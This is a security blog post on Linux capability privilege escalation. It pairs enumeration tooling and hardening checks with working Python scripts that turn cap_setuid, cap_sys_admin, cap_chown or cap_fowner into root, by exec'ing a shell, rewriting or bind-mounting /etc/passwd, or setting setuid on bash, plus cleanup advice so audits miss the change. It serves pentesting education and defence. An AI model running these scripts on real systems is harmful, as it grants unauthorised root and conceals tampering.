BIPI

Linux Capabilities Abuse: cap_setuid, cap_dac_read_search, and Friends

Cybersecurity

Linux capabilities are SUID with extra steps. We map the dangerous ones, show how to enumerate file and thread capabilities, and walk the exploits for the usual suspects.

By Arjun Raghavan, Security & Systems Lead, BIPI · March 11, 2025 · 9 min read

#linux#capabilities#privesc#cap-setuid#pentesting

Why capabilities exist

Capabilities split root power into smaller pieces. Instead of giving ping the entire root toolkit, give it cap_net_raw. The intent is good. The implementation leaves plenty of room for operator mistakes, and that is where privesc lives.

Enumeration

  • getcap -r / 2>/dev/null lists file capabilities across the filesystem; only the p (permitted) flag matters on its own, a capability marked +i alone needs the same bit in the caller's inheritable set before it grants anything
  • capsh --print decodes the capability sets of the current shell into names
  • grep Cap /proc/self/status (or /proc/<pid>/status for a running service) shows the raw bitmaps: CapInh, CapPrm, CapEff, CapBnd, CapAmb; decode a mask with capsh --decode=<hex>
  • filecap from libcap-ng for a friendlier view of file capabilities
  • LinPEAS surfaces dangerous capabilities in its capabilities section
  • getcap only sees files; a running process can hold capabilities that no binary on disk advertises (systemd AmbientCapabilities=, container runtime defaults), so walk /proc/*/status for the services as well
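
Here is the enumeration step as a script, an added example rather than anything from the original post: it decodes the Cap* bitmaps of a /proc status dump with the bit table from linux/capability.h, parses getcap -r in both of its output spellings, and flags the six capabilities this post covers. The status and getcap text in it are constructed samples, not output from a real host.

```python
# Added example (not from the original post): decode the Cap* bitmaps from
# /proc/<pid>/status and parse getcap -r output, then flag the capabilities
# this post treats as root-equivalent. All sample input below is constructed.
import re

# Bit positions from linux/capability.h, CAP_CHOWN = 0 .. CAP_CHECKPOINT_RESTORE = 40.
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
    "cap_fsetid", "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap",
    "cap_linux_immutable", "cap_net_bind_service", "cap_net_broadcast",
    "cap_net_admin", "cap_net_raw", "cap_ipc_lock", "cap_ipc_owner",
    "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot", "cap_sys_ptrace",
    "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod",
    "cap_lease", "cap_audit_write", "cap_audit_control", "cap_setfcap",
    "cap_mac_override", "cap_mac_admin", "cap_syslog", "cap_wake_alarm",
    "cap_block_suspend", "cap_audit_read", "cap_perfmon", "cap_bpf",
    "cap_checkpoint_restore",
]

# The six the post walks through.
DANGEROUS = {"cap_setuid", "cap_dac_read_search", "cap_dac_override",
             "cap_sys_admin", "cap_chown", "cap_fowner"}


def decode_mask(hex_mask):
    """Turn a CapEff-style hex mask into capability names, lowest bit first."""
    mask = int(hex_mask, 16)
    names = [name for bit, name in enumerate(CAP_NAMES) if mask >> bit & 1]
    if mask >> len(CAP_NAMES):
        # A newer kernel than this table knows about; do not silently drop bits.
        names.append("unknown_bits_above_%d" % (len(CAP_NAMES) - 1))
    return names


def parse_proc_status(text):
    """Map each Cap* line of a /proc/<pid>/status dump to decoded names."""
    sets = {}
    for line in text.splitlines():
        m = re.match(r"^(CapInh|CapPrm|CapEff|CapBnd|CapAmb):\s*([0-9a-fA-F]+)\s*$", line)
        if m:
            sets[m.group(1)] = decode_mask(m.group(2))
    return sets


def parse_getcap(text):
    """Parse getcap -r output in both the old '/path = caps+ep' and the newer
    '/path caps=ep' spellings. Returns {path: permitted caps}. Only the 'p'
    flag counts: a +i-only file capability needs the same bit in the caller's
    inheritable set before it grants anything."""
    files = {}
    for line in text.splitlines():
        tokens = [t for t in line.split() if t != "="]
        if len(tokens) < 2:
            continue
        path, permitted = tokens[0], set()
        for clause in tokens[1:]:
            m = re.match(r"^([a-z_,]*)([+=-])([eip]*)$", clause)
            if not m:
                continue
            caps, op, flags = m.groups()
            names = set(CAP_NAMES) if caps in ("", "all") else set(caps.split(","))
            if "p" not in flags:
                continue
            permitted = permitted - names if op == "-" else permitted | names
        files[path] = permitted
    return files


def triage(getcap_text):
    """[(path, sorted dangerous caps)] for every file that carries one."""
    return [(path, sorted(caps & DANGEROUS))
            for path, caps in parse_getcap(getcap_text).items() if caps & DANGEROUS]


# Constructed samples, not captured from any real host.
SAMPLE_STATUS = ("Name:\tbash\nCapInh:\t0000000000000000\nCapPrm:\t0000000000200080\n"
                 "CapEff:\t0000000000200080\nCapBnd:\t000001ffffffffff\nCapAmb:\t0000000000000000\n")
SAMPLE_GETCAP = ("/usr/bin/ping cap_net_raw=ep\n/usr/bin/python3.11 cap_setuid=ep\n"
                 "/opt/backup/rsync = cap_dac_read_search+ep\n/usr/sbin/arping cap_net_raw+i\n")

if __name__ == "__main__":
    for name, caps in parse_proc_status(SAMPLE_STATUS).items():
        print(name, ",".join(caps) or "-")
    for path, bad in triage(SAMPLE_GETCAP):
        print("DANGEROUS", path, ",".join(bad))
```

On a live host, feed it `getcap -r / 2>/dev/null` and the contents of /proc/<pid>/status instead of the samples; the arping line in the sample shows why the +i-only case is reported as carrying nothing.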

cap_setuid, the obvious one

If a binary carries cap_setuid=ep and you can make it call setuid(0), you are root. Python, perl and ruby with this capability are trivial: a one liner that calls setuid(0) and execs sh is the canonical proof of concept. Two details are worth knowing. The setuid(0) itself only changes your uids; the process still holds nothing beyond cap_setuid. It is the execve that follows that hands the shell the full set, because the kernel treats a caller with euid 0 as if the file carried every capability (no_new_privs or SECBIT_NOROOT suppress that gain and leave you at uid 0 with the same single capability). And cap_setgid is a separate capability: without it setgid(0) fails with EPERM, which stops mattering once euid is 0.
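
The proof of concept written out, as an added example that is not the post's own code: it reads CapEff first so that a missing capability is reported rather than surfacing as a bare EPERM, then does the setuid(0) and the exec. It assumes the interpreter running it is the file that carries cap_setuid and that /bin/sh exists.

```python
#!/usr/bin/env python3
# Added example (not the original post's code): the cap_setuid proof of concept
# with a check of the effective set first, so a failure is explained instead of
# an unexplained EPERM. Assumes this interpreter is the file carrying cap_setuid.
import os
import sys

CAP_SETUID_BIT = 7  # CAP_SETUID in linux/capability.h


def effective_mask(status_text):
    """The CapEff bitmap from a /proc/<pid>/status dump, as an int."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return int(line.split()[1], 16)
    raise ValueError("no CapEff line in status text")


def has_effective(status_text, bit):
    return bool(effective_mask(status_text) >> bit & 1)


def become_root(shell="/bin/sh"):
    with open("/proc/self/status") as f:
        status = f.read()
    if not has_effective(status, CAP_SETUID_BIT):
        sys.exit("cap_setuid is not in CapEff; setuid(0) would fail with EPERM")
    # setuid(0) rewrites real, effective and saved uid but leaves this process
    # holding nothing beyond cap_setuid. The execve is the step that matters:
    # a caller with euid 0 is treated as if the new image carried every
    # capability, so the shell starts with the full set (no_new_privs or
    # SECBIT_NOROOT would leave it at uid 0 without that gain).
    os.setuid(0)
    try:
        os.setgid(0)  # needs cap_setgid, a separate capability; optional here
    except PermissionError:
        pass
    os.execv(shell, [shell])


if __name__ == "__main__":
    become_root()
```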

cap_dac_read_search and cap_dac_override

  • cap_dac_read_search bypasses file read and directory search permission checks, not write: dump /etc/shadow, read every user's private keys. It also unlocks open_by_handle_at(2), which from inside a container can reach host files by handle
  • cap_dac_override bypasses read, write and execute permission checks (execute still needs at least one x bit on the file)
  • Combine with tar or rsync for filesystem exfiltration without root
  • GTFOBins capabilities page has the per binary one liners

cap_sys_admin, the catch all

cap_sys_admin is so broad it is sometimes called the new root. It gates mount(2), umount, pivot_root, most namespace creation, and a long tail of other syscalls. It does not by itself hand you uid 0, but the mount path almost always gets you there: bind-mount a passwd file you control over /etc/passwd (or mount a tmpfs over /etc and repopulate it) and su to the root entry you wrote. Namespace creation via unshare or clone is gated on it too, which matters for container escape work but is not an escalation on its own.

cap_chown and cap_fowner

  • cap_chown lets you change the owner of any file: chown /etc/passwd or /etc/shadow to yourself, write in a root entry with a hash you know, su. Chowning your shell root:root gains nothing on its own, and chown clears any setuid bit anyway
  • cap_fowner bypasses the owner check on operations that need ownership, chmod included, so chmod u+s /bin/bash succeeds on a root-owned file; bash -p then keeps euid 0
  • Both are common on storage and backup tooling, audit those binaries first
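
One added example that covers both this section and the cap_sys_admin one above (the code is not from the original post): three routes that share a single helper which rewrites root's entry in a passwd file with a hash of your choosing. The cap_sys_admin route bind-mounts the crafted file over /etc/passwd through mount(2), the cap_chown route takes ownership of /etc/passwd and rewrites it in place, and the cap_fowner route sets the setuid bit on /bin/bash. Assumptions: the Python interpreter is the binary carrying the capability, the system uses glibc (for the ctypes mount call) and pam_unix, and the hash is generated by you beforehand, for example with openssl passwd -6; the hash and passwd text in the sample are placeholders.

```python
#!/usr/bin/env python3
# Added example (not the original post's code): three routes to root that share
# one helper, each keyed to the capability the target binary carries. The
# interpreter running this is assumed to be that binary, glibc is assumed for
# the ctypes mount(2) call, and the password hash comes from the caller (for
# example `openssl passwd -6 'newpass'`); the hash in the sample is a placeholder.
import ctypes
import os
import stat
import sys

MS_BIND = 4096  # MS_BIND from linux/mount.h


def rewrite_root_entry(passwd_text, new_hash):
    """Return passwd_text with root's password field set to new_hash.
    A hash in field 2 of /etc/passwd makes pam_unix skip /etc/shadow for that
    account, so the file we control is the only one consulted at su time."""
    out, replaced = [], False
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[0] == "root":
            fields[1] = new_hash
            replaced = True
        out.append(":".join(fields))
    if not replaced:
        raise ValueError("no root entry found")
    return "\n".join(out) + "\n"


def route_sys_admin(new_hash, staging="/tmp/passwd"):
    """cap_sys_admin: bind-mount a crafted passwd over /etc/passwd via mount(2).
    Nothing on disk changes; `umount /etc/passwd` afterwards removes it."""
    with open("/etc/passwd") as f:
        crafted = rewrite_root_entry(f.read(), new_hash)
    with open(staging, "w") as f:
        f.write(crafted)
    libc = ctypes.CDLL("libc.so.6", use_errno=True)
    # mount(source, target, fstype, flags, data); a bind mount needs no fstype.
    if libc.mount(staging.encode(), b"/etc/passwd", None, MS_BIND, None) != 0:
        raise OSError(ctypes.get_errno(), "mount(2) failed")


def route_chown(new_hash):
    """cap_chown: take ownership of /etc/passwd, then ordinary owner write
    access lets us rewrite it. Chown it back to root when you are done."""
    os.chown("/etc/passwd", os.getuid(), -1)
    with open("/etc/passwd") as f:
        crafted = rewrite_root_entry(f.read(), new_hash)
    with open("/etc/passwd", "w") as f:
        f.write(crafted)


def route_fowner(shell="/bin/bash"):
    """cap_fowner: chmod on a root-owned file passes the owner check, so the
    setuid bit can be set on bash; `bash -p` then keeps euid 0."""
    os.chmod(shell, stat.S_IMODE(os.stat(shell).st_mode) | stat.S_ISUID)


# Constructed sample, not a real passwd file or a real hash.
SAMPLE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
                 "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n")
SAMPLE_HASH = "$6$placeholder$notarealhash"

if __name__ == "__main__":
    routes = {"sys_admin": route_sys_admin, "chown": route_chown}
    if len(sys.argv) == 2 and sys.argv[1] == "fowner":
        route_fowner()
        print("now run: /bin/bash -p")
    elif len(sys.argv) == 3 and sys.argv[1] in routes:
        routes[sys.argv[1]](sys.argv[2])
        print("now run: su root")
    else:
        sys.exit("usage: %s sys_admin|chown <hash>  or  %s fowner" % (sys.argv[0], sys.argv[0]))
```

Whichever route you take, clean up afterwards: umount /etc/passwd, chown the file back, or strip the setuid bit. The chown route in particular leaves /etc/passwd owned by your uid, which any later audit will catch.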

Ambient versus inherited

Capabilities come in five sets: effective, permitted, inheritable, bounding and ambient. Files carry a permitted set, an inheritable set and a single effective flag. For most exploitation you care about a file's permitted set (the =ep or +ep in getcap output), since that lands in the new process regardless of what the caller held; a +i-only file capability needs the same bit in the caller's inheritable set before it means anything. Ambient capabilities are newer, since kernel 4.3, and solve the opposite problem: a capability that is in both the permitted and inheritable sets can be raised into the ambient set, and from there it survives execve of an ordinary binary with no file capabilities and no setuid bit. That is how scripts and service managers keep a capability across an exec, and it is also why a process can hold capabilities that getcap never shows.
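
The rules above are easier to reason about as code. The following is an added example, not part of the original post: it implements the execve transformation from capabilities(7) over a cut-down universe of names (the post's six plus cap_net_raw; the kernel has 41) and lets you replay the cases that matter, the ping file capability, an ambient capability surviving a plain exec, a +i-only file capability doing nothing, and the setuid(0)-then-exec trick with and without no_new_privs.

```python
# Added example (not the original post's code): the capability transformation
# the kernel applies at execve, as laid out in capabilities(7), run on
# constructed inputs. Sets are sets of capability names; the universe is cut
# down to the capabilities this post discusses plus cap_net_raw, where the
# kernel has 41.
UNIVERSE = frozenset({"cap_chown", "cap_dac_override", "cap_dac_read_search",
                      "cap_fowner", "cap_setgid", "cap_setuid", "cap_sys_admin",
                      "cap_net_raw"})
EMPTY = frozenset()


def proc_sets(inheritable=EMPTY, permitted=EMPTY, effective=EMPTY,
              bounding=UNIVERSE, ambient=EMPTY):
    """The five sets of the calling thread, P in capabilities(7)."""
    return {"inheritable": frozenset(inheritable), "permitted": frozenset(permitted),
            "effective": frozenset(effective), "bounding": frozenset(bounding),
            "ambient": frozenset(ambient)}


def file_caps(permitted=EMPTY, inheritable=EMPTY, effective=False, setid=False):
    """What getcap shows: F(permitted), F(inheritable) and the single effective
    flag (the 'e' in =ep), plus whether the file is setuid/setgid."""
    return {"permitted": frozenset(permitted), "inheritable": frozenset(inheritable),
            "effective": effective, "setid": setid}


def execve_caps(proc, fcaps, ruid, euid, noroot=False, no_new_privs=False):
    """Return the post-exec sets. fcaps=None is a plain binary. ruid/euid are
    the ids after setuid-bit processing. noroot models SECBIT_NOROOT."""
    f_perm, f_inh, f_eff, privileged = EMPTY, EMPTY, False, False
    if fcaps is not None and not no_new_privs:   # no_new_privs: file caps ignored
        f_perm, f_inh, f_eff = fcaps["permitted"], fcaps["inheritable"], fcaps["effective"]
        privileged = bool(f_perm or f_inh or fcaps["setid"])
    # Ambient survives only across a non-privileged (plain) binary.
    ambient = EMPTY if privileged else proc["ambient"]
    # Root rule: for uid 0 the file sets are notionally all ones, and the
    # effective flag is notionally set when euid is 0.
    if not noroot and (ruid == 0 or euid == 0):
        f_perm, f_inh = UNIVERSE, UNIVERSE
        f_eff = f_eff or euid == 0
    permitted = (proc["inheritable"] & f_inh) | (f_perm & proc["bounding"]) | ambient
    if no_new_privs:
        permitted &= proc["permitted"]        # never more than before
    effective = permitted if f_eff else ambient
    return {"inheritable": proc["inheritable"], "permitted": frozenset(permitted),
            "effective": frozenset(effective), "bounding": proc["bounding"],
            "ambient": ambient}


if __name__ == "__main__":
    # ping with cap_net_raw=ep run by an ordinary user
    print(execve_caps(proc_sets(), file_caps({"cap_net_raw"}, effective=True), 1000, 1000))
    # the cap_setuid trick: uids already 0, exec a plain /bin/sh
    print(execve_caps(proc_sets(permitted={"cap_setuid"}, effective={"cap_setuid"}), None, 0, 0))
```

The second printed case is the whole reason the cap_setuid one liner needs its exec: with the uids at 0 and the file sets notionally all ones, the permitted set of the new shell is the entire bounding set, and the effective flag is forced on.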

Detection and hardening

  • Baseline file capabilities at build (store the getcap -r output with the image), alert on any path that appears or changes
  • Drop capabilities in systemd units with CapabilityBoundingSet= (CapabilityBoundingSet=~CAP_SYS_ADMIN removes one, an empty assignment removes them all) and keep AmbientCapabilities= to the minimum the service needs
  • Use NoNewPrivileges=yes in unit files: it makes execve ignore setuid bits and file capabilities, so the service and its children cannot gain a capability through a child
  • auditd on the capset syscall for processes outside expected services, for example -a always,exit -F arch=b64 -S capset -F auid>=1000 -F auid!=4294967295 -k capset; file capabilities are granted at execve without any capset call, so also audit execve of the binaries in your baseline
  • Falco rule on processes acquiring CAP_SYS_ADMIN in unexpected contexts

Capabilities were meant to be a safer SUID. In practice they are a quieter SUID, which means defenders look at them less.
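
Two of the checks above as an added example (not the post's code, and not tied to any particular tooling): a diff of a stored getcap -r baseline against a fresh run, and a lint of a systemd unit's [Service] section for NoNewPrivileges= and the CapabilityBoundingSet= merge rules. The units and getcap output it runs on are constructed samples; the hardened unit deliberately keeps cap_dac_read_search, so the lint's one remaining finding on it is the item a reviewer signs off by hand.

```python
# Added example (not the original post's code): two of the detection and
# hardening checks as code, a getcap baseline diff and a lint of the [Service]
# section of a systemd unit. The unit files and getcap output are constructed.

# The capabilities this post singles out, in the spelling systemd uses.
WATCH = ("CAP_SYS_ADMIN", "CAP_SETUID", "CAP_DAC_READ_SEARCH", "CAP_DAC_OVERRIDE",
         "CAP_CHOWN", "CAP_FOWNER")


def getcap_table(text):
    """{path: normalised caps string} from getcap -r output. The old format's
    lone '=' token is dropped and a single '+ep' clause is spelled '=ep', so
    the same capability set compares equal across libcap versions."""
    table = {}
    for line in text.splitlines():
        tokens = [t for t in line.split() if t != "="]
        if len(tokens) >= 2:
            table[tokens[0]] = " ".join(tokens[1:]).replace("+", "=")
    return table


def getcap_diff(baseline_text, current_text):
    """(added, removed, changed) paths between a stored baseline and a fresh run."""
    base, cur = getcap_table(baseline_text), getcap_table(current_text)
    added = sorted(p for p in cur if p not in base)
    removed = sorted(p for p in base if p not in cur)
    changed = sorted(p for p in cur if p in base and cur[p] != base[p])
    return added, removed, changed


def service_section(unit_text):
    """[(key, value)] pairs of the [Service] section, in file order."""
    pairs, in_service = [], False
    for line in unit_text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_service = line == "[Service]"
        elif in_service and "=" in line and not line.startswith("#"):
            key, value = line.split("=", 1)
            pairs.append((key.strip(), value.strip()))
    return pairs


def bounding_allows(pairs, cap):
    """Evaluate CapabilityBoundingSet= lines the way systemd merges them:
    plain lines OR together, '~' lines subtract, an empty value clears all."""
    deny_mode, names = True, set()          # deny_mode: everything except names
    for key, value in pairs:
        if key != "CapabilityBoundingSet":
            continue
        if value == "":
            deny_mode, names = False, set()
        elif value.startswith("~"):
            listed = set(value[1:].upper().split())
            names = names | listed if deny_mode else names - listed
        else:
            listed = set(value.upper().split())
            names = listed if deny_mode else names | listed
            deny_mode = False
    return cap not in names if deny_mode else cap in names


def lint_unit(unit_text):
    """Findings for a unit: missing NoNewPrivileges and watched caps left in
    the bounding set. An empty list means the unit passes these two checks."""
    pairs = service_section(unit_text)
    findings = []
    nnp = [v for k, v in pairs if k == "NoNewPrivileges"]
    if not nnp or nnp[-1].lower() not in ("yes", "true", "on", "1"):
        findings.append("NoNewPrivileges is not set to yes")
    for cap in WATCH:
        if bounding_allows(pairs, cap):
            findings.append("bounding set still allows " + cap)
    return findings


# Constructed samples.
BASELINE_GETCAP = "/usr/bin/ping = cap_net_raw+ep\n"
CURRENT_GETCAP = "/usr/bin/ping cap_net_raw=ep\n/usr/bin/python3.11 cap_setuid=ep\n"
WEAK_UNIT = "[Unit]\nDescription=backup\n\n[Service]\nExecStart=/opt/backup/run\n"
HARDENED_UNIT = ("[Unit]\nDescription=backup\n\n[Service]\nExecStart=/opt/backup/run\n"
                 "NoNewPrivileges=yes\nCapabilityBoundingSet=CAP_DAC_READ_SEARCH\n"
                 "AmbientCapabilities=CAP_DAC_READ_SEARCH\n")

if __name__ == "__main__":
    print(getcap_diff(BASELINE_GETCAP, CURRENT_GETCAP))
    print(lint_unit(WEAK_UNIT))
    print(lint_unit(HARDENED_UNIT))
```

Run the diff from whatever already ships your image manifests (the baseline is just the getcap output captured at build time), and point the lint at /etc/systemd/system and the drop-in directories rather than at single files.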

Closing checklist

getcap -r, intersect with GTFOBins capabilities page, audit any custom binary that carries cap_setuid, cap_sys_admin, cap_dac_read_search, or cap_chown. Four flags, ten minutes, one root.
